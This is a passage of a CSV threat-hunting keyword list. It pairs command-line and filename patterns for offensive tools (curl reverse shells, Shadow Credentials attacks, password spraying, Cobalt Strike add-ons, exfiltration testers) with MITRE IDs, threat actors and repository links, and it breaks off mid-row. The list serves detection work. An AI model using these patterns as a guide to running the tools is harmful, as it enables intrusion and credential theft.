+"*.py *.exe *NormalDLL.dll*","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","0","N/A","N/A","1","16","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z"
+"*.py *0.0.0.0*--serve-forever*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z"
+"*.py *--dependabot-workaround*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z"
+"*.py 127.0.0.1 50050 logtracker password*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z"
+"*.py -aesKey ""9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab""*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*.py --certificate *.pem --private-key *.pem --listen-port *","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - 
TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z"
+"*.py --client ftp --username * --password * --ip * --datatype ssn*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*.py --client https --data-size * --ip * --datatype cc*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*.py -d ""test.local"" -u ""john"" -p ""password123"" --target ""user2"" --action ""list"" --dc-ip ""10.10.10.1""*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z"
+"*.py -d * -u * -p * --target * --action * --export PEM*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z"
+"*.py -d * -u * -p * --target * --action ""add"" --filename * 
","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z"
+"*.py -d * -u * -p * --target * --action ""clear""* ","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z"
+"*.py -d * -u * -p * --target * --action ""info"" --device-id *","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z"
+"*.py -d * -u * -p * --target * --action ""list"" *","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z"
+"*.py -d * -u * -p * --target * --action ""remove"" --device-id *","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z"
+"*.py discover -H domain_list.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - 
T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z"
+"*.py enum -H * -U *.txt -P *.txt -*.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z"
+"*.py -f *.exe -e -m 4","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z"
+"*.py --file *.ps1 --server amsi*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z"
+"*.py -k * -f *.doc -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z"
+"*.py lock -H * -u administrator -d *","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z"
+"*.py -method BOTH -dc-ip *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z"
+"*.py -method LDAPS -dc-ip *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z"
+"*.py --server amsi --file *.exe*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z"
+"*.py spray -ep *","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z"
+"*.py --zip -c All -d * -u * --hashes 'ffffffffffffffffffffffffffffffff':* -dc *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*.py* --payload *.ps1*","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","0","N/A","10","10","612","91","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z"
+"*.py* service -action create -service-name *","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the 
operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z"
+"*.py* -service-name * -hashes *","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z"
+"*.py*found-users.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
+"*.rclone.exe 
config*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z"
+"*.resources.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*.rtf.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.rtf.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - 
TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.rtf.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.rtf.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.rtf.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.rtf.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.rtf.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.rtf.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.sccmhunter*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","0","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z"
+"*.search.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection 
controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*.secure.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*.sh *--checksec*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*.sh *cvelist-file:*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*.sharpgen *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","0","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*.ShellcodeRDI*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*.sites.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.SliverRPC/*","offensive_tool_keyword","sliver","Sliver is an 
open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*.smtp.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.ssl.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.stage.123456.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
